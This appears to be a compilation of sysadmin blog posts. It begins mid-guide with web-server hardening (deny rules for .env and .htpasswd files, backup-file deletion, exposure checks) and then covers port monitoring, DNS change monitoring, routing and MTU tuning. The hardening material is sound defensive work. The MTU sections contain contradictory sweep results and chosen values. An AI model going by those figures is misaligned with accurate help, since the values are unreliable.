# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/
# Or restrict access via .htaccess
<Files "config.php">
Order allow,deny
Deny from all
</Files>
#### **Backup files**
# Remove backup files from web directory
find /var/www/html -name "*.bak" -o -name "*.backup" -o -name "*.old" | xargs rm -f
# Create a cron job to clean up regularly (group the -name tests so -delete
# applies to both, and append to the existing crontab instead of replacing it)
( crontab -l 2>/dev/null; echo "0 2 * * * find /var/www/html \( -name '*.bak' -o -name '*.backup' \) -delete" ) | crontab -
## 5. **General Security Best Practices**
### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes
# Deny access to hidden files and directories
<Files .*>
Order allow,deny
Deny from all
</Files>
# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
Order allow,deny
Deny from all
</FilesMatch>
# Protect sensitive files
<FilesMatch "^(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$">
Order allow,deny
Deny from all
</FilesMatch>
# Nginx equivalent (this goes in the server block of nginx.conf, not .htaccess):
location ~ /(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$ {
deny all;
return 404;
}
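Note that on Apache 2.4+ the Order/Deny directives above require mod_access_compat; a sketch of the same .htaccess rules in 2.4 syntax, written out via a heredoc (the web root path is an example):
```bash
# Sketch: Apache 2.4 equivalents of the .htaccess rules above.
cat > /var/www/html/.htaccess <<'EOF'
# Disable directory browsing
Options -Indexes
# Deny access to hidden files
<Files ".*">
    Require all denied
</Files>
# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
    Require all denied
</FilesMatch>
# Protect sensitive files
<FilesMatch "^(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$">
    Require all denied
</FilesMatch>
EOF
```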
## 6. Quick Security Audit Commands
Run these commands to find and fix common issues:
# Find all .git directories in web root
find /var/www/html -type d -name .git
# Find all .env files
find /var/www/html -name .env
# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;
# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
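If you want to run all of these in one pass, a tiny wrapper script might look like this (the web root path is an example):
```bash
#!/bin/bash
# Sketch: run the audit checks above in one go and print what they find.
WEB_ROOT=/var/www/html
echo "== .git directories =="
find "$WEB_ROOT" -type d -name .git
echo "== .env files =="
find "$WEB_ROOT" -name .env
echo "== Backup files =="
find "$WEB_ROOT" -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
echo "== Directories without an index file =="
find "$WEB_ROOT" -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;
```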
## 7. Testing Your Fixes
After implementing fixes, test them:
# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404
# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list
# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved
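To check several paths in one go, a short loop prints the HTTP status for each (the site URL and path list are examples; you want 404 or 403 everywhere):
```bash
# Expect 404 (or 403) for every sensitive path, and no directory listing HTML.
SITE="https://yoursite.com"
for path in .git/config .env config.php backup.zip images/; do
  code=$(curl -s -o /dev/null -w '%{http_code}' "$SITE/$path")
  echo "$SITE/$path -> HTTP $code"
done
```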
## 8. Preventive Measures
### 1. Use a deployment script that excludes sensitive files (see the sketch below):
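A minimal sketch using rsync (the host, paths, and exclude list are examples; adjust for your project):
```bash
# Deploy the site without ever shipping sensitive files to the web root.
rsync -av --delete \
  --exclude '.git' \
  --exclude '.env' \
  --exclude '*.bak' --exclude '*.backup' --exclude '*.old' \
  ./ user@webserver:/var/www/html/
```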
### 2. Regular security scans (see the cron sketch below):
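For example, a weekly cron entry that re-runs the scanner from earlier in this post (the script path and schedule are examples; this appends to the existing crontab rather than replacing it):
```bash
# Run vunscan.sh every Sunday at 03:00 and keep the output in a log file.
( crontab -l 2>/dev/null; echo "0 3 * * 0 /opt/scripts/vunscan.sh yoursite.com >> /var/log/vunscan.log 2>&1" ) | crontab -
```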
### 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare
**Remember:** The goal is not just to hide these files (security through obscurity) but to properly secure them or remove them from the web-accessible directory entirely.

macOS: How to see which processes are using a specific port (e.g. 443)

Below is a useful script for when you want to see which processes are using a specific port; it refreshes the view every 20 seconds until you press Ctrl+C.

#!/bin/bash
# Port Monitor Script for macOS
# Usage: ./port_monitor.sh <port_number>
# Check if port number is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <port_number>"
echo "Example: $0 8080"
exit 1
fi
PORT=$1
# Validate port number
if ! [[ $PORT =~ ^[0-9]+$ ]] || [ $PORT -lt 1 ] || [ $PORT -gt 65535 ]; then
echo "Error: Please provide a valid port number (1-65535)"
exit 1
fi
# Function to display processes using the port
show_port_usage() {
local timestamp=$(date "+%Y-%m-%d %H:%M:%S")
# Clear screen for better readability
clear
echo "=================================="
echo "Port Monitor - Port $PORT"
echo "Last updated: $timestamp"
echo "Press Ctrl+C to exit"
echo "=================================="
echo
# Check for processes using the port with lsof - both TCP and UDP
if lsof -i :$PORT &>/dev/null || netstat -an | grep -E "[:.]$PORT[[:space:]]" &>/dev/null; then
echo "Processes using port $PORT:"
echo
lsof -i :$PORT -P -n | head -1
echo "--------------------------------------------------------------------------------"
lsof -i :$PORT -P -n | tail -n +2
echo
# Also show netstat information for additional context
echo "Network connections on port $PORT:"
echo
printf "%-6s %-30s %-30s %-12s\n" "PROTO" "LOCAL ADDRESS" "FOREIGN ADDRESS" "STATE"
echo "--------------------------------------------------------------------------------------------"
# Show all connections (LISTEN, ESTABLISHED, etc.)
# Use netstat -n to show numeric addresses
netstat -anp tcp | grep -E "\.$PORT[[:space:]]" | while read line; do
# Extract the relevant fields from netstat output
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
foreign_addr=$(echo "$line" | awk '{print $5}')
state=$(echo "$line" | awk '{print $6}')
# Only print if we have valid data
if [ -n "$proto" ] && [ -n "$local_addr" ]; then
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "$state"
fi
done
# Also check UDP connections
netstat -anp udp | grep -E "\.$PORT[[:space:]]" | while read line; do
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
foreign_addr=$(echo "$line" | awk '{print $5}')
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "-"
done
# Also check for any established connections using lsof
echo
echo "Active connections with processes:"
echo "--------------------------------------------------------------------------------------------"
lsof -i :$PORT -P -n 2>/dev/null | grep -v LISTEN | tail -n +2 | while read line; do
if [ -n "$line" ]; then
echo "$line"
fi
done
else
echo "No processes found using port $PORT"
echo
# Check if the port might be in use but not showing up in lsof
local netstat_result=$(netstat -anv | grep -E "\.$PORT ")
if [ -n "$netstat_result" ]; then
echo "However, netstat shows activity on port $PORT:"
echo "$netstat_result"
fi
fi
echo
echo "Refreshing in 20 seconds... (Press Ctrl+C to exit)"
}
# Trap Ctrl+C to exit gracefully
trap 'echo -e "\n\nExiting port monitor..."; exit 0' INT
# Main loop - refresh every 20 seconds
while true; do
show_port_usage
sleep 20
done
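
If you only need a one-off answer rather than a continuously refreshing view, a single lsof call is usually enough (port 443 as an example):

```bash
# Who is listening on TCP 443, and is anything bound to UDP 443?
lsof -nP -iTCP:443 -sTCP:LISTEN
lsof -nP -iUDP:443
```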

Windows Server: Polling critical DNS entries for any changes or errors

If you have tier 1 services that are dependent on a few DNS records, then you may want a simple batch job to monitor those DNS records for changes or deletion.

The script below contains an example list of DNS entries (replace these records with the ones you want to monitor).

@echo off
setlocal enabledelayedexpansion
REM ============================================================================
REM DNS Monitor Script for Windows Server
REM Purpose: Monitor DNS entries for changes every 15 minutes
REM Author: Andrew Baker
REM Version: 1.0
REM Date: August 13, 2018
REM ============================================================================
REM Configuration Variables
set "LOG_FILE=dns_monitor.log"
set "PREVIOUS_FILE=dns_previous.tmp"
set "CURRENT_FILE=dns_current.tmp"
set "CHECK_INTERVAL=900"
REM DNS Entries to Monitor (Comma Separated List)
REM Add or modify domains as needed
set "DNS_LIST=google.com,microsoft.com,github.com,stackoverflow.com,amazon.com,facebook.com,twitter.com,linkedin.com,youtube.com,cloudflare.com"
REM Initialize log file with header if it doesn't exist
if not exist "%LOG_FILE%" (
echo DNS Monitor Log - Started on %DATE% %TIME% > "%LOG_FILE%"
echo ============================================================================ >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
:MAIN_LOOP
echo [%DATE% %TIME%] Starting DNS monitoring cycle...
echo [%DATE% %TIME%] INFO: Starting DNS monitoring cycle >> "%LOG_FILE%"
REM Clear current results file
if exist "%CURRENT_FILE%" del "%CURRENT_FILE%"
REM Process each DNS entry
for %%d in (%DNS_LIST%) do (
call :CHECK_DNS "%%d"
)
REM Compare with previous results if they exist
if exist "%PREVIOUS_FILE%" (
call :COMPARE_RESULTS
) else (
echo [%DATE% %TIME%] INFO: First run - establishing baseline >> "%LOG_FILE%"
)
REM Copy current results to previous for next comparison
copy "%CURRENT_FILE%" "%PREVIOUS_FILE%" >nul 2>&1
echo [%DATE% %TIME%] DNS monitoring cycle completed. Next check in 15 minutes...
echo [%DATE% %TIME%] INFO: DNS monitoring cycle completed >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Wait 15 minutes (900 seconds) before next check
timeout /t %CHECK_INTERVAL% /nobreak >nul
goto MAIN_LOOP
REM ============================================================================
REM Function: CHECK_DNS
REM Purpose: Resolve DNS entry and log results
REM Parameter: %1 = Domain name to check
REM ============================================================================
:CHECK_DNS
set "DOMAIN=%~1"
echo Checking DNS for: %DOMAIN%
REM Perform nslookup and capture results
nslookup "%DOMAIN%" > temp_dns.txt 2>&1
REM Check if nslookup was successful
if %ERRORLEVEL% equ 0 (
REM Extract IP addresses from nslookup output
for /f "tokens=2" %%i in ('findstr /c:"Address:" temp_dns.txt ^| findstr /v "#53"') do (
set "IP_ADDRESS=%%i"
echo %DOMAIN%,!IP_ADDRESS! >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] INFO: %DOMAIN% resolves to !IP_ADDRESS! >> "%LOG_FILE%"
)
REM Handle case where no IP addresses were found in successful lookup
findstr /c:"Address:" temp_dns.txt | findstr /v "#53" >nul
if !ERRORLEVEL! neq 0 (
echo %DOMAIN%,RESOLUTION_ERROR >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - No IP addresses found in DNS response >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
) else (
REM DNS resolution failed
echo %DOMAIN%,DNS_FAILURE >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - DNS resolution failed >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
REM Clean up temporary file
if exist temp_dns.txt del temp_dns.txt
goto :EOF
REM ============================================================================
REM Function: COMPARE_RESULTS
REM Purpose: Compare current DNS results with previous results
REM ============================================================================
:COMPARE_RESULTS
echo Comparing DNS results for changes...
REM Read previous results into memory
if exist "%PREVIOUS_FILE%" (
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "PREV_%%a=%%b"
)
)
REM Compare current results with previous
for /f "tokens=1,2 delims=," %%a in (%CURRENT_FILE%) do (
set "CURRENT_DOMAIN=%%a"
set "CURRENT_IP=%%b"
REM Get previous IP for this domain
set "PREVIOUS_IP=!PREV_%%a!"
if "!PREVIOUS_IP!"=="" (
REM New domain added
echo [%DATE% %TIME%] INFO: New domain added to monitoring: !CURRENT_DOMAIN! = !CURRENT_IP! >> "%LOG_FILE%"
) else if "!PREVIOUS_IP!" neq "!CURRENT_IP!" (
REM DNS change detected
echo [%DATE% %TIME%] WARNING: DNS change detected for !CURRENT_DOMAIN! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Previous IP: !PREVIOUS_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Current IP:  !CURRENT_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: *** INVESTIGATE DNS CHANGE *** >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Also display warning on console
echo.
echo *** WARNING: DNS CHANGE DETECTED ***
echo Domain: !CURRENT_DOMAIN!
echo Previous: !PREVIOUS_IP!
echo Current:  !CURRENT_IP!
echo Check log file for details: %LOG_FILE%
echo.
)
)
REM Check for domains that disappeared from current results
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "CHECK_DOMAIN=%%a"
set "FOUND=0"
for /f "tokens=1 delims=," %%c in (%CURRENT_FILE%) do (
if "%%c"=="!CHECK_DOMAIN!" set "FOUND=1"
)
if "!FOUND!"=="0" (
echo [%DATE% %TIME%] WARNING: Domain !CHECK_DOMAIN! no longer resolving or removed from monitoring >> "%LOG_FILE%"
)
)
goto :EOF
REM ============================================================================
REM End of Script
REM ============================================================================

macOS: Using gping over a Zero Trust network client (like Zscaler)

Once you start using a zero trust network, the first casualty is normally the ping command. The gping (graphical ping) command-line tool displays a color-coded, real-time graph of continuous pings to a specified host, and it supports specifying alternate interfaces/gateways.

First, let’s find which interface to use. The “arp -a” command displays the ARP cache, listing both dynamic and static entries along with the interface each one was learned on.

$ arp -a
unfisecuregateway (192.168.0.1) at 74:83:c2:d0:c8:cd on en0 ifscope [ethernet]
amazon-ce482021d.localdomain (192.168.0.66) at 8:7c:39:e3:de:af on en0 ifscope [ethernet]
km98e898.localdomain (192.168.0.117) at 0:17:c8:87:5a:f7 on en0 ifscope [ethernet]
? (192.168.0.210) at 9c:14:63:5c:aa:de on en0 ifscope [ethernet]
? (192.168.0.211) at 9c:14:63:5c:aa:ac on en0 ifscope [ethernet]
? (192.168.0.212) at 9c:14:63:5c:aa:e1 on en0 ifscope [ethernet]
? (192.168.0.213) at 9c:14:63:5c:ab:20 on en0 ifscope [ethernet]
? (192.168.0.214) at 9c:14:63:5c:aa:9 on en0 ifscope [ethernet]
? (192.168.0.215) at 9c:14:63:5c:aa:74 on en0 ifscope [ethernet]
? (192.168.0.216) at 9c:14:63:5c:ab:64 on en0 ifscope [ethernet]
? (192.168.0.217) at 9c:14:63:2d:23:5f on en0 ifscope [ethernet]
? (192.168.0.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet]
? (239.255.255.250) at 1:0:5e:7f:ff:fa on en0 ifscope permanent [ethernet]

You will see I have an en0 interface. Let’s try gping via the en0 interface:

$ brew install gping
$ gping -i en0 google.com
google.com (172.217.170.110)             last 27.274ms min 26.945ms  max 134.849ms avg 41.896ms  jtr 2.916ms   p95 107.494ms t/o 0
130.606ms│
│
│                   ⢀
│                   ⢸
│                   ⢸
112.88ms │                   ⢸
│                   ⣼
│                   ⣿
│        ⡆          ⣿
95.154ms │   ⢀    ⡇          ⣿
│   ⢸    ⡇          ⣿
│   ⢸    ⡇          ⣿
│   ⢸   ⢠⡇          ⣿          ⢀
77.428ms │   ⣼   ⢸⡇      ⡆   ⣿          ⢸
│   ⣿   ⢸⡇      ⡇  ⢸ ⡇         ⢸
│   ⣿   ⢸⡇     ⢰⡇⢀ ⢸ ⡇         ⢸
│   ⣿   ⢸⢇     ⢸⡇⢸ ⢸ ⡇         ⡇⡇
59.702ms │   ⡟⡄  ⢸⢸     ⢸⢇⣼ ⢸ ⡇         ⡇⡇
│   ⡇⡇  ⢸⢸     ⡸⢸⡏⡆⢸ ⡇         ⡇⡇
│   ⡇⡇  ⢸⢸     ⡇⢸⡇⡇⢸ ⡇     ⡆   ⡇⡇
│   ⡇⡇  ⢸⢸ ⢰   ⡇⢸⠃⡇⢸ ⡇    ⢀⢇   ⡇⡇
41.976ms │  ⢸ ⡇  ⡇⢸ ⣼  ⢀⠇⢸ ⡇⡎ ⡇⡆   ⢸⢸   ⡇⡇
│  ⢸ ⡇  ⡇⢸ ⡿⡀ ⢸   ⢇⡇ ⣷⡇   ⢸⢸  ⢸ ⢸
│  ⢸ ⡇  ⡇⢸ ⡇⣇⢆⡸   ⢸⡇ ⣿⢱   ⡸⠸⡀⢠⢸ ⢸
│⣀ ⡸ ⡇  ⡇⢸⢸ ⡿⠈⠇   ⢸⡇ ⡇⢸ ⢀⡀⡇ ⡇⡜⢿ ⢸
24.25ms  │ ⠉  ⠉⠉⠉⠁⠈⠉ ⠁     ⠈   ⠈⠉⠁⠈⠁ ⠉⠁⠈ ⠈⠁
└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
11:39:10                                                             11:39:25                                                    11:39:40
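
gping can also graph more than one host at a time, which makes it easy to tell a flaky local network apart from a slow zero trust tunnel. A sketch reusing the -i flag from the example above (192.168.0.1 is the gateway from the earlier arp output):

```bash
# Compare the local gateway and an internet host side by side on en0.
gping -i en0 192.168.0.1 google.com
```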

macOS: Tracing which network interface will be used to route traffic to an IP/DNS address

If you have multiple connections on your device (and maybe you have a zero trust client installed), how do you find out which network interface will be used to route the traffic?

Below is a route get request for Google’s DNS service:

$ route get 8.8.8.8
route to: dns.google
destination: dns.google
gateway: 100.64.0.1
interface: utun3
flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
0         0         0         0         0         0      1400         0

If you have multiple interfaces enabled, then the first item in the Service Order will be used. If you want to see the default interface for your device:

$ route -n get 0.0.0.0 | grep interface
interface: en0

Let’s see what traffic is flowing over that utun3 tunnel interface:

$ netstat utun3 | grep ESTABLISHED
tcp4       0      0  100.64.0.1.65271       jnb02s11-in-f4.1.https ESTABLISHED
tcp4       0      0  100.64.0.1.65269       jnb02s02-in-f14..https ESTABLISHED
tcp4       0      0  100.64.0.1.65262       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65261       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65260       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65259       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65258       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65257       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65256       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65255       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65254       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65253       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65252       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65251       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65250       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65249       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65248       ec2-13-244-140-3.https ESTABLISHED
tcp4       0      0  100.64.0.1.65247       192.0.73.2.https       ESTABLISHED
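
If you do this often, a one-liner can print just the chosen interface for any destination (a small sketch; the destination is an example):

```bash
# Print only the interface macOS will use to reach a given destination.
dst=8.8.8.8
route -n get "$dst" | awk '/interface:/ {print $2}'
```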

Finding and Setting the Maximum Transmission Unit (MTU) on a Windows Machine

If you have just changed ISPs or moved house and your internet suddenly starts misbehaving, the likelihood is that your Maximum Transmission Unit (MTU) is set too high for your ISP. The default internet-facing MTU is 1500 bytes but, depending on your setup, it often needs to be set much lower.

Step 1:

First check your current MTU across all your ipv4 interfaces using netsh:

netsh interface ipv4 show subinterfaces
MTU  MediaSenseState   Bytes In  Bytes Out  Interface
------  ---------------  ---------  ---------  -------------
4294967295                1          0          0  Loopback Pseudo-Interface 1
1492                1        675        523  Local Area Connection

As you can see, the Local Area Connection interface is set to a 1492-byte MTU. So how do we find out what it should be? We are going to send a fixed-size echo packet and tell the network not to fragment it. If the packet is too big for any hop along the path, the request will fail.

Next, test a payload sized for your current MTU. The -l value is the ICMP payload and excludes the 28-byte IP/ICMP header, so for a 1492 MTU the test size is 1492 - 28 = 1464 (if this fails, you know your MTU is set too high):

ping 8.8.8.8 -f -l 1464

Procedure to find optimal MTU:

For PPPoE, your Max MTU should be no more than 1492 to allow space for the 8 byte PPPoE “wrapper”. 1492 + 8 = 1500. The ping test we will be doing does not include the IP/ICMP header of 28 bytes. 1500 – 28 = 1472. Include the 8 byte PPPoE wrapper if your ISP uses PPPoE and you get 1500 – 28 – 8 = 1464.

The best value for MTU is that value just before your packets get fragmented. Add 28 to the largest packet size that does not result in fragmenting the packets (since the ping command specifies the ping packet size, not including the IP/ICMP header of 28 bytes), and this is your Max MTU setting.

Below is an automated ping sweep that tests increasing packet sizes until one fails (stepping up by 10 bytes per iteration):

C:\Windows\system32>for /l %i in (1360,10,1500) do @ping -n 1 -w 1000 -l %i -f 8.8.8.8
Pinging 8.8.8.8 with 1400 bytes of data:
Reply from 8.8.8.8: bytes=1400 time=6ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 6ms, Maximum = 6ms, Average = 6ms
Pinging 8.8.8.8 with 1410 bytes of data:
Reply from 8.8.8.8: bytes=1410 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging 8.8.8.8 with 1420 bytes of data:
Reply from 8.8.8.8: bytes=1420 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging 8.8.8.8 with 1430 bytes of data:
Reply from 8.8.8.8: bytes=1430 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

Once you find the MTU, you can set it as per below:

netsh interface ipv4 set subinterface "Local Area Connection" mtu=1360 store=persistent

Finding and Setting the Maximum Transmission Unit (MTU) on Mac/OSX

If you have just changed ISPs or moved house and your internet suddenly starts misbehaving, the likelihood is that your Maximum Transmission Unit (MTU) is set too high for your ISP. The default internet-facing MTU is 1500 bytes but, depending on your setup, it often needs to be set much lower.

Step 1:

First check your current MTU.

$ networksetup -getMTU en0
Active MTU: 1500 (Current Setting: 1500)

As you can see, the Mac is set to a 1500-byte MTU. So how do we find out what it should be? We are going to send a fixed-size echo packet and tell the network not to fragment it. If the packet is too big for any hop along the path, the request will fail.

Next enter:

$ ping -D -s 1500 www.google.com
PING www.google.com (172.217.170.100): 1500 data bytes
ping: sendto: Message too long
ping: sendto: Message too long
Request timeout for icmp_seq 0
ping: sendto: Message too long
Request timeout for icmp_seq 1
ping: sendto: Message too long

Ok, so our MTU is too high.

Procedure to find optimal MTU:

Hint: For PPPoE, your Max MTU should be no more than 1492 to allow space for the 8 byte PPPoE “wrapper”. 1492 + 8 = 1500. The ping test we will be doing does not include the IP/ICMP header of 28 bytes. 1500 – 28 = 1472. Include the 8 byte PPPoE wrapper if your ISP uses PPPoE and you get 1500 – 28 – 8 = 1464.

The best value for MTU is that value just before your packets get fragmented. Add 28 to the largest packet size that does not result in fragmenting the packets (since the ping command specifies the ping packet size, not including the IP/ICMP header of 28 bytes), and this is your Max MTU setting.

Below is an automated ping sweep that tests increasing packet sizes until one fails (stepping up by 10 bytes per iteration):

$ ping -g 1300 -G 1600 -h 10 -D www.google.com
PING www.google.com (172.217.170.100): (1300 ... 1600) data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
Request timeout for icmp_seq 3
Request timeout for icmp_seq 4
Request timeout for icmp_seq 5
Request timeout for icmp_seq 6
ping: sendto: Message too long
Request timeout for icmp_seq 7

As you can see, the “Message too long” error appears at icmp_seq 7, i.e. a payload of 1300 + (7 × 10) = 1370 bytes, so the largest payload that can be sent without fragmenting is 1360 bytes.
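
If you would rather not eyeball the sweep output, a small loop can do the same check and report the result directly (a sketch using the same flags as above: -D don’t fragment, -s payload size, -c count, -t timeout in seconds):

```bash
#!/bin/bash
# Step the payload up by 10 bytes and stop at the first "Message too long".
host=www.google.com
last_ok=0
for ((size=1300; size<=1500; size+=10)); do
  out=$(ping -c 1 -t 2 -D -s "$size" "$host" 2>&1)
  if echo "$out" | grep -q "Message too long"; then
    break                 # this size no longer fits the path MTU
  fi
  last_ok=$size           # the packet was at least sendable (reply or not)
done
echo "Largest unfragmented payload: $last_ok bytes -> MTU $((last_ok + 28))"
```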

Once you have found the largest unfragmented payload, verify it and then set the MTU:

$ ping -D -s 1360 www.google.com
PING www.google.com (172.217.170.100): 1360 data bytes
Request timeout for icmp_seq 0

There is no “Message too long” error this time, so a 1360-byte payload fits. I can therefore set my MTU to 1360 + 28 = 1388:

networksetup -setMTU en0 1388